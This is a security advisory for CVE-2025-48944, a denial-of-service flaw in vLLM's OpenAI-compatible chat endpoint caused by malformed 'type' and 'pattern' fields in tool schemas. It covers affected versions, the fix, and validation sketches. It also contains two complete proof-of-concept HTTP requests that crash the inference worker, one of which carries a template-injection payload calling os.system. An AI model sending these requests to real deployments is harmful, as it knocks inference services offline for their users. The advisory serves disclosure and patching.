GHSA-vrq3-r879-7m65

Source
https://github.com/advisories/GHSA-vrq3-r879-7m65
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-vrq3-r879-7m65/GHSA-vrq3-r879-7m65.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-vrq3-r879-7m65
Aliases
  • CVE-2025-48944
Published
2025-05-28T19:42:32Z
Modified
2025-05-30T21:47:09.830960Z
Severity
  • 6.5 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Summary
vLLM Tool Schema allows DoS via Malformed pattern and type Fields
Details

Summary

The vLLM backend used with the /v1/chat/completions OpenAI-compatible endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing the inference worker to crash with a single request. The worker remains down until it is restarted.

Details

The "type" field is expected to be one of: "string", "number", "object", "boolean", "array", or "null". Supplying any other value will cause the worker to crash with the following error:

RuntimeError: [11:03:34] /project/cpp/json_schema_converter.cc:637: Unsupported type "somethingornothing"
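
A minimal guard for this case, shown as a sketch only (the function name and placement are assumptions, not vLLM's actual code), is to whitelist the "type" value before the schema is handed to the converter:

# Hypothetical pre-validation sketch; not vLLM's implementation.
ALLOWED_TYPES = {"string", "number", "object", "boolean", "array", "null"}

def check_type_field(value: str) -> None:
    # Reject any "type" value outside the JSON Schema types the converter supports.
    if value not in ALLOWED_TYPES:
        raise ValueError(f"unsupported JSON Schema type: {value!r}")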

The "pattern" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors.

For example, the following inputs will crash the worker:

  • An unclosed {, [, or (
  • A closed but empty {} or []

Here are some of the runtime errors from the crash, depending on what gets injected:

RuntimeError: [12:05:04] /project/cpp/regex_converter.cc:73: Regex parsing error at position 4: The parenthesis is not closed.

RuntimeError: [10:52:27] /project/cpp/regex_converter.cc:73: Regex parsing error at position 2: Invalid repetition count.

RuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed.
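
A coarse pre-check on the "pattern" field could reject such input before it reaches native code. This is only a sketch: Python's re dialect is not identical to the C++ converter's, so it filters obviously malformed patterns rather than everything the converter would reject.

import re

# Hypothetical pre-validation sketch; not vLLM's implementation.
def check_pattern_field(pattern: str) -> None:
    # Refuse patterns that do not even compile in Python's re module,
    # e.g. unclosed (, [ or { and invalid repetition counts.
    try:
        re.compile(pattern)
    except re.error as exc:
        raise ValueError(f"malformed pattern: {exc}") from exc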

PoC

Here is the POST request using the type field to crash the worker. Note that the type field is set to "something" rather than one of the expected values:

POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 579
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

{ "model": "mistral-nemo-instruct", "messages": [{ "role": "user", "content": "crash via type" }], "tools": [ { "type": "function", "function": { "name": "crash01", "parameters": { "type": "object", "properties": { "a": { "type": "something" } } } } } ], "toolchoice": { "type": "function", "function": { "name": "crash01", "arguments": { "a": "test" } } }, "stream": false, "maxtokens": 1 }

Here is the POST request using the pattern field to crash the worker. Note that the pattern field is set to an RCE-style payload; it could just as well have been set to {{}}. I was not able to achieve RCE in my testing, but it does crash the worker.

POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 718
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

{ "model": "mistral-nemo-instruct", "messages": [ { "role": "user", "content": "Crash via Pattern" } ], "tools": [ { "type": "function", "function": { "name": "crash02", "parameters": { "type": "object", "properties": { "a": { "type": "string", "pattern": "{{ import('os').system('echo RCEOK > /tmp/pwned') or 'SAFE' }}" } } } } } ], "toolchoice": { "type": "function", "function": { "name": "crash02" } }, "stream": false, "maxtokens": 32, "temperature": 0.2, "topp": 1, "n": 1 }

Impact

Backend workers can be crashed, causing anyone using the inference engine to receive 500 Internal Server Error responses on subsequent requests.

Fix

  • https://github.com/vllm-project/vllm/pull/17623
Database specific
{
    "nvd_published_at": "2025-05-30T19:15:30Z",
    "cwe_ids": [
        "CWE-20"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2025-05-28T19:42:32Z"
}
Affected packages

Package
  PyPI / vllm

Affected ranges
  Type: ECOSYSTEM
  Introduced: 0.8.0
  Fixed: 0.9.0

Affected versions
  0.8.0
  0.8.1
  0.8.2
  0.8.3
  0.8.4
  0.8.5
  0.8.5.post1